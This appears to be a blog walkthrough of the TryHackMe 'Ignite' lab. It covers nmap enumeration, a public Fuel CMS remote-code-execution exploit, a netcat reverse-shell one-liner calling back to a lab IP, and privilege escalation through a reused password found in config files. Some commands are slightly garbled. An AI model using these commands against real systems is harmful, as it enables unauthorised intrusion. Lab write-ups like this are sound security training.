Post cover image

June 12, 2026

TryHackMe Ignite Walkthrough

Introduction

ibr_yzr

3 min read

Introduction

Ignite is an easy-rated TryHackMe room designed to introduce penetration testers to web application exploitation and Linux privilege escalation.

This room is ideal for beginners who want hands-on experience with enumeration, vulnerability assessment, exploitation, and post-exploitation techniques commonly encountered during real-world penetration tests.

Initial Reconnaissance

The first step was identifying the services exposed by the target machine. I performed a comprehensive Nmap scan to discover open ports, service versions, and potential vulnerabilities.

The scan revealed an Apache web server running on port 80, indicating that the attack surface would likely involve a web application. nmap -A -T4 -O -sC -sV -p- (Target IP)

None

sudo nmap -v -A -sC — script vuln -p- (TARGETIP)

None

During enumeration, I discovered that the website was powered by Fuel CMS. Identifying the exact CMS version is important because outdated versions often contain publicly known vulnerabilities. Using publicly available vulnerability databases and Searchsploit, I located an exploit that targets a Remote Code Execution (RCE) vulnerability. This vulnerability allows an attacker to execute commands on the server without valid credentials.

→ searchsploit Fuel

None

→ searchsploit -m 50477

None None

After confirming the vulnerability, I used the exploit to obtain command execution on the target machine.

To make interaction with the target easier, I established a reverse shell connection back to my attacking machine. This provided an interactive shell running under the web server account. → sudo python3 /root/50477.py -u http://TARGETIP

None

Open another command prompt and → nc -lnvp 4242

None

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>61|nc 10.10.3.49 4242 >/tmp/f

None None

Post-Exploitation Enumeration

Once inside the system, I began searching for configuration files, credentials, and sensitive information.

Web application configuration files often contain database passwords, API keys, or administrator credentials. Careful inspection of these files revealed valuable information that could be leveraged later in the attack.

None None

Privilege Escalation

During enumeration, I discovered credentials stored within application configuration files.

The recovered password was reused by a privileged account on the system. Using these credentials, I was able to switch users and obtain elevated privileges.

This demonstrates a common real-world security issue: password reuse across multiple services.

None None

Capturing the Flags

With root-level access obtained, I successfully captured the user and root flags, completing the room.

The challenge highlights the importance of proper patch management, secure credential storage, and avoiding password reuse across systems.

  • Enumeration is the foundation of every penetration test.
  • Software version disclosure can lead directly to known vulnerabilities.
  • Public exploits should always be validated and understood before use.
  • Configuration files frequently contain sensitive information.
  • Password reuse remains one of the most common privilege escalation vectors.
  • Thorough post-exploitation enumeration is often more important than the initial exploit itself. Thank you